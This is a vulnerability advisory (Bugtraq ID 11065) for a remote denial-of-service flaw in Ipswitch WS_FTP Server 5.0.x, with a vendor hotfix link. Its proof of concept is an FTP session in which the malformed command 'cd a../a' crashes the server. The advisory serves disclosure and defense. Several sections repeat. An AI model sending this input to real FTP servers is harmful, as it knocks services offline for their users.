Ipswitch WS_FTP Server CD Command Malformed File Path Remote Denial of Service Vulnerability
BID:11065
Info
Ipswitch WS_FTP Server CD Command Malformed File Path Remote Denial of Service Vulnerability
| Bugtraq ID: | 11065 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 30 2004 12:00AM |
| Updated: | Aug 30 2004 12:00AM |
| Credit: | This issue was disclosed by lion <[email protected]>. |
| Vulnerable: |
Ipswitch WS FTP Server 5.0.3 Ipswitch WS FTP Server 5.0.2 Ipswitch WS FTP Server 5.04 |
| Not Vulnerable: |
Ipswitch WS FTP Server 5.04 Hotfix 1 |
Discussion
Ipswitch WS_FTP Server CD Command Malformed File Path Remote Denial of Service Vulnerability
WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command.
WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well.
WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command.
WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well.
Exploit / POC
Ipswitch WS_FTP Server CD Command Malformed File Path Remote Denial of Service Vulnerability
No exploit is required.
The following proof of concept is available:
E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.
No exploit is required.
The following proof of concept is available:
E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.
Solution / Fix
Ipswitch WS_FTP Server CD Command Malformed File Path Remote Denial of Service Vulnerability
Solution:
WS_FTP Server Version 5.04 Hotfix 1 is not vulnerable to this issue.
Ipswitch WS FTP Server 5.04
Ipswitch WS FTP Server 5.0.2
Ipswitch WS FTP Server 5.0.3
Solution:
WS_FTP Server Version 5.04 Hotfix 1 is not vulnerable to this issue.
Ipswitch WS FTP Server 5.04
-
Ipswitch ifs504HF1.exe
http://ftp1.ipswitch.com/ipswitch/product_support/ws_ftp_server/ifs504 HF1.exe
Ipswitch WS FTP Server 5.0.2
-
Ipswitch ifs504HF1.exe
http://ftp1.ipswitch.com/ipswitch/product_support/ws_ftp_server/ifs504 HF1.exe
Ipswitch WS FTP Server 5.0.3
-
Ipswitch ifs504HF1.exe
http://ftp1.ipswitch.com/ipswitch/product_support/ws_ftp_server/ifs504 HF1.exe
References
Ipswitch WS_FTP Server CD Command Malformed File Path Remote Denial of Service Vulnerability
References:
References:
- WS FTP Server Support Homepage (IPSwitch)
- WS_FTP Server Denial of Service Vulnerability ("lion"
)